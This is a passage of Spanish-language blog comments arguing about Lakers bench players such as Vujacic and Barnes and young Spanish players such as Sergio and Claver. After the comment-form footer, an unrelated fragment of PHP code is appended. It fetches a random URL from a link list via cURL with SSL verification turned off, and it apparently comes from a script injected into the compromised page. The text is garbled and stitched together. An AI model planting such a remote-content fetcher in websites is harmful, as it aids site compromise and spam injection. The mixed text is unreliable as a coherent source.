    Y ojo… porque si Barnes hubiera sido de L.A. en estas circunstancias la cantidad de ostias que se hubiera llevado por parte de algunos de vosotros hubiera sido mítica.

    Con respecto a lo que dices de Sergio citaré a Wooden: “Littles things make big things happens”. Y en aquel mundial el jugón nº 12 contaba tanto como el resto de jugones a los que ahora muchos desprecian.
    En concreto de no ser por este jugón en lugar de jugones hubieramos sido secundones. Literal, no como eso de los dos triples.

      Citar

  45. Love Denise dice:
    #45

    venga por favor, los pedorros tienen anillos gracias a los titulares, y eso lo sabes bien, y me extraña tu defensa ahora a Vujacic. Incomprensible, si los tiros libres lo hubiera fallado, crucificado, como los metió, ahora resulta que es un buen jugador de banquillo.

      Citar

  46. TheDeerHunter dice:
    #46

    nooo, tienes razón
    no voy a poner a Vujacic en un altar por lo que ha hecho en dos o tres buenos partidos de una final… y el banco es el que es, teniendo en cuenta lo que hay invertido en los 1-6 contratos titulares… también he dicho otras veces que lamentablemente Vujacic se ganó su contratísimo de una forma muy positiva…

    pero eso no quita que me parezca incomprensible tu defensa a ultranza de un jugador de corte medio (en el mejor de los casos) como Barnes frente a jugadores cuyo máximos activos son el talento y la juventud como es el caso de Sergio, de Claver… o por analogía del Marc Gasol del año del mundial.
    Y ya que estamos, conociendote tampoco entiendo que no seas más crítico con alguno de los piezas de tu equipo… en concreto con Barnes. También me gustaría conocer más concretamente tu opinión sincera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>